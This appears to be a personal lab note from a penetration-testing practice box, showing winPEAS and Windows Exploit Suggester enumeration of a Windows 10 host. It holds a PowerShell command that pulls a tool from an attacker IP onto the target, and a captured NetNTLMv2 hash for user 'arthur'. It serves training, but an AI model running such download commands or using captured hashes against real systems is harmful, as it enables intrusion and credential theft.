PEAS

Conducting an automated enumeration after performing a manual enumeration

PS C:\Users\arthur> iwr -Uri http://192.168.45.249/winPEASany.exe -OutFile .\winPEASany.exe
PS C:\Users\arthur> REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
The operation completed successfully.

Delivery complete

Executing PEAS

ENV

╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
    COMPUTERNAME: FISHYYY
    USERPROFILE: C:\Users\arthur
    HOMEPATH: \Users\arthur
    LOCALAPPDATA: C:\Users\arthur\AppData\Local
    PSModulePath: C:\Users\arthur\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files\AdoptOpenJDK\jdk-8.0.292.10-hotspot\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\arthur\AppData\Local\Microsoft\WindowsApps;
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    LOGONSERVER: \\FISHYYY
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    HOMEDRIVE: C:
    SystemRoot: C:\WINDOWS
    SESSIONNAME: RDP-Tcp#21
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    APPDATA: C:\Users\arthur\AppData\Roaming
    PROCESSOR_REVISION: 1101
    USERNAME: arthur
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OneDrive: C:\Users\arthur\OneDrive
    CLIENTNAME: kali
    OS: Windows_NT
    USERDOMAIN_ROAMINGPROFILE: FISHYYY
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
    ComSpec: C:\WINDOWS\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\arthur\AppData\Local\Temp
    ProgramFiles: C:\Program Files
    NUMBER_OF_PROCESSORS: 2
    TMP: C:\Users\arthur\AppData\Local\Temp
    ProgramData: C:\ProgramData
    ProgramW6432: C:\Program Files
    windir: C:\WINDOWS
    USERDOMAIN: FISHYYY
    PUBLIC: C:\Users\Public
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
    ComSpec: C:\WINDOWS\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files\AdoptOpenJDK\jdk-8.0.292.10-hotspot\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\WINDOWS\TEMP
    TMP: C:\WINDOWS\TEMP
    USERNAME: SYSTEM
    windir: C:\WINDOWS
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 17 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 1101

N/A

AV

Total AV

UAC

PowerShell

C:\Users\arthur\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

.NET

Token Privileges (`authur`)

Enumerated

Processes

TotalAV.exe

Services

Modifiable Services

NTLM

arthur::FISHYYY:1122334455667788:b141a44530bc234e100529215d76fd5a:01010000000000007df3b42168ced7012d95c6b0ad940f5e000000000800300030000000000000000000000000200000da0e65c3d498a42d004e19e47291bd72a3aab7f411207f992d9b1887f42ad6d70a00100000000000000000000000000000000000090000000000000000000000

Interesting Files / Directories

Write access

WESNG

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash 
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250418
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 10 Version 20H2 for x64-based Systems
    - Generation: 10
    - Build: 19042
    - Version: 20H2
    - Architecture: x64-based
    - Installed hotfixes (5): KB5009467, KB4562830, KB4580325, KB5006670, KB5005699
[+] Loading definitions
    - Creation date of definitions: 20250418
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
 
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
Date: 20210413
CVE: CVE-2021-27094
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows ELAM
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
Date: 20210413
CVE: CVE-2021-28447
KB: KB5001330
Title: Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
Affected product: Windows 10 Version 20H2 for x64-based Systems
Affected component: Windows Early Launch Antimalware Driver
Severity: Important
Impact: Security Feature Bypass
Exploits: https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66, https://bi-zone.medium.com/measured-boot-and-malware-signatures-exploring-two-vulnerabilities-found-in-the-windows-loader-5a4fcc3c4b66
 
[-] Missing patches: 1
    - KB5001330: patches 4 vulnerabilities
[I] KB with the most recent release date
    - ID: KB5001330
    - Release date: 20210413
[+] Done. Displaying 4 of the 209 vulnerabilities found.

InfoSec LAB

Explorer

Fish_Automated

PEAS

ENV

N/A

AV

UAC

PowerShell

.NET

Token Privileges (`authur`)

Processes

Services

Modifiable Services

NTLM

Interesting Files / Directories

WESNG

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Fish_Automated

PEAS

ENV

N/A

AV

UAC

PowerShell

.NET

Token Privileges (authur)

Processes

Services

Modifiable Services

NTLM

Interesting Files / Directories

WESNG

Interactive Graph View

Table of Contents

Backlinks

Token Privileges (`authur`)